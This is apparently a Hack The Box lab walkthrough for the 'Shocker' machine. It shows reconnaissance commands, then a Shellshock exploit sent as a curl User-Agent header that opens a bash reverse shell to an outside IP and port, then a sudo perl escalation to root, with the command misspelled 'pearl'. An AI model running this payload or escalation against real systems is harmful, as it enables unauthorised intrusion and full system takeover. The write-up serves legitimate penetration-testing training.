Walkthrough: Shocker[HTB]

Pulkit Mital
4 min readFeb 2, 2021

--

Target Machine Information:
Host Name: Shocker
IP Address: 10.129.90.38
OS: Linux

Overview

In this walk through, I will be showing how to follow a step by step methodology to own a user and root without Metasploit.

Step1 — In the first step we will use Nmap to scan the target for all the open ports, services running on the open ports and OS running on the target machine. It can be done with the following command

sudo nmap -A -O 10.129.90.38

From the Nmap scan these ports and services are active on the machine:

  • Port 80 — HTTP Service running apache httpd 2.4.18
  • Port 2222 — SSH Service running with version OpenSSH 7.2p2

Step 2 — As we analyze the ports, we see that the above machine is running a web Apache server. Now let’s run Nikto scan to see if we find any vulnerabilities or not.

nikto -h 10.129.90.38

As we see from the Nikto scan, we didn’t find any useful thing which help us to pwn this machine.

Step 3— As we know this is a web server, let’s run the directory search scan if we find any of the useful directory which will help us to pwn this machine. Lets run the below command

dirb http://10.129.90.38/

In the dirb scan, we have found various file and directory and we got a useful directory cgi-bin, which tells us that the machine is vulnerable to shellshock.
Lets scan the cg-bin directory for any shell scripts that we can use.

Step 4 — Now let’s scan cgi-bin directory for any shell script or other useful file extensions using below command

dirb http://10.129.90.38/cgi-bin/

In the dirb scan, we found a shell script user.sh.

Step 5 — Let’s look into the user.sh shell script that we have found in the previous scan

curl -vvv http://10.129.90.38/cgi-bin/user.sh

Step 6 — Let’s try the shellshock vulnerability and try to get the reverse shell using below command and also start a net cat listener to get the shell.

curl -H ‘User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.29/9000 0>&1’ http://10.129.90.38/cgi-bin/user.sh

Meanwhile, in the tab where you have started the listener will get the shell as shown below.

Now we see that, we have got the least privelege shell of a user. Now we can go to /home/shelly directory to get the user.txt and will get the flag. Thus we own the user

Step 7 — Now let’s try to escalate the privilege and run the below command

sudo -l

When you run this command, you will see that you can run the pearl using sudo command without using any password.Let’s run the below command to get the root shell using perl.

sudo pearl -e ‘exec “/bin/bash”;’

After running the above command, you will notice that you have got the root shell.

Now, we can navigate to /root directory and get the flag stored inside the file root.txt.

--

--